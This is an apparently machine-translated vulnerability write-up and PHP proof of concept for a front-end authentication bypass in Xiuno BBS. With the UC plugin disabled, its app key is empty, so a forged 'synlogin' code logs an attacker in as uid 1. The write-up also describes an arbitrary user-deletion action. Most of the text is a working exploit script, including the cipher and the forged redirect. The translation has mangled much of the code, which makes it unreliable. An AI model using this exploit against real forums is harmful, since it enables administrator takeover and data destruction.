0 × 0 vulnerability Overview
0 × 1 code parsing
0 × 2 PoC
0 × 0Vulnerability Overview
- Xiuno implements a plug-in that uses the uc interface to log on to the uc center.
- The uc plug-in is not enabled for xiuno by default.
- When the uc plug-in is not enabled, the key: uc_appkey is empty. Therefore, when the uc plug-in is not enabled, the encryption and decryption functions provided by the uc plug-in can bypass this feature.
- Uc uses key to decrypt the passed parameters. If the decrypted action is synlogin and uid is valid, the uid will be used to log on to the front-end of the xiuno forum.
0 × 1
Code Parsing
This version is 2.0
$ Code = core: gpc ('code ');
// Decrypt the passed code parameter with the key and put it in the get Array
Parse_str (uc_authcode ($ code, 'decode', $ ucconf ['uc _ appkey']), $ get );
$ Action = $ get ['action'];
// If the action is synlogin, use the uid in the get array as the current user login
Elseif ($ action = 'synlogin '){
$ Uid = intval ($ get ['uid']);
$ Muser = new user ();
$ Userdb = $ muser-& gt; read ($ uid );
$ Muser-& gt; set_login_cookie ($ userdb );
Exit (API_RETURN_SUCCEED );
}
// An arbitrary user deletion vulnerability exists.
Elseif ($ action = 'deleteuser '){
$ Uids = $ get ['kids'];
$ Uids = str_replace ("'", '', $ uids );
$ Arr = explode (',', $ uids );
$ Muser = new user ();
Foreach ($ arr as $ uid ){
$ Uid = intval ($ uid );
$ Muser-& gt; xdelete ($ uid );
}
Exit (API_RETURN_SUCCEED );
}
POC:
<? Php
/*
* Xiuno bbs RC2 foreground authorization bypass vulnerability exp
* Author: ztz @ Dis9Team
* Mail: ztz5651483@gmail.com
* Blog: ztz.fuzzexp.org
* Instructions:
* $ _ GET ['target']: target Domain Name
* $ _ GET ['IP']: Target ip Address
*
* For example:
* Http://yoursite.com/xiuno.php? Target = www.xiuno.com & amp; ip = 114.113.224.156
* Then visit the home page manually.
*/
Function uc_authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0 ){
$ Ckey_length = 4;
$ Key = md5 ($ key );
$ Keya = md5 (substr ($ key, 0, 16 ));
$ Keyb = md5 (substr ($ key, 16, 16 ));
$ Keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length )):'';
$ Cryptkey = $ keya. md5 ($ keya. $ keyc );
$ Key_length = strlen ($ cryptkey );
$ String = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0). substr (md5 ($ string. $ keyb), 0, 16). $ string;
$ String_length = strlen ($ string );
$ Result = '';
$ Box = range (1, 0,255 );
$ Rndkey = array ();
For ($ I = 0; $ I & lt; = 255; $ I ++ ){
$ Rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);
}
For ($ j = $ I = 0; $ I & lt; 256; $ I ++ ){
$ J = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256;
$ Tmp = $ box [$ I];
$ Box [$ I] = $ box [$ j];
$ Box [$ j] = $ tmp;
}
For ($ a = $ j = $ I = 0; $ I & lt; $ string_length; $ I ++ ){
$ A = ($ a + 1) % 256;
$ J = ($ j + $ box [$ a]) % 256;
$ Tmp = $ box [$ a];
$ Box [$ a] = $ box [$ j];
$ Box [$ j] = $ tmp;
$ Result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);
}
If ($ operation = 'decode '){
If (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10)-time () & gt; 0) & amp; & amp; substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16 )){
Return substr ($ result, 26 );
} Else {
Return '';
}
} Else {
Return $ keyc. str_replace ('=', '', base64_encode ($ result ));
}
}
Function send ($ request, $ ip)
{
$ Result = '';
$ Meta = parse_url ($ request );
$ Path = isset ($ meta ['path'])? $ Meta ['path']: exit ('path error ');
$ Host = isset ($ meta ['host'])? $ Meta ['host']: exit ('host error ');
$ Query = isset ($ meta ['query'])? $ Meta ['query']: exit ('query error ');
$ Packet = "GET $ path? $ Query HTTP/1.1 \ r \ n ";
$ Packet. = "User-Agent: Mozilla/5.0 \ r \ n ";
$ Packet. = "Host:". $ ip. "\ r \ n ";
$ Packet. = "Connection: Close \ r \ n ";
$ Fp = fsockopen ($ ip, 80 );
Fputs ($ fp, $ packet );
While (! Feof ($ fp ))
{
$ Result. = fgets ($ fp, 4096 );
}
If (strpos ($ result, 'set-cooker') & gt; 0)
{
$ Begin = strpos ($ result, 'set-Cookie :');
$ End = strpos ($ result, ";", $ begin );
$ Cookie = substr ($ result, $ begin + 11, $ end-$ begin-11 );
Return $ cookie;
}
}
$ Target = $ _ GET ['target'];
$ Ip = $ _ GET ['IP'];
$ Time = time ();
$ Str = "time = $ time & amp; action = synlogin & amp; uid = 1 ";
$ En_str = uc_authcode ($ str, 'encode ','');
$ Request = "http: // $ target/plugin/ucenter/api/uc. php? Code = ". urlencode ($ en_str );
Header ("Location: $ request", true, 302 );
?>